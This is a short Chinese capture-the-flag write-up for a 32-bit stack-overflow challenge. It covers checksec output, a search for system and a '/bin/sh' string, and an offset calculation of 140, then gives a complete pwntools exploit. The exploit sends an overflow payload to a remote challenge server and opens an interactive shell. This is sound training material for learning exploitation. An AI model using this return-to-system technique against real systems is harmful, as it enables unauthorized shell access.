文件下载地址:
链接:https://pan.baidu.com/s/1jiR84G8Ji3luscmYTOOKAA
提取码:jz7n
0x01.分析
checksec:
32位程序,开启NX。
源码:
发现系统调用了system,但是参数并不是/bin/sh,后面有read函数,存在栈溢出,继续寻找,看是否有bin/sh:
果然存在。
得到bin/sh的地址,最后只需确定一下偏移量:
由于这个程序不知道为什么再gdb里不能正常退出,可能是系统调用的原因,具体不是很清楚,不过我们可以手动计算出:
应该是0x80-0+4=140.(0是指举例esp长度,4是ebp的大小)。
0x02.exp
##!/usr/bin/env python
from pwn import*
r=remote("111.198.29.45",47065)
#r=process('./level2')
system_adr=0x08048320
bin_sh_adr=0x0804A024
payload=140*'A'+p32(system_adr)+p32(0)+p32(bin_sh_adr)
r.recvuntil(":")
r.sendline(payload)
r.interactive()
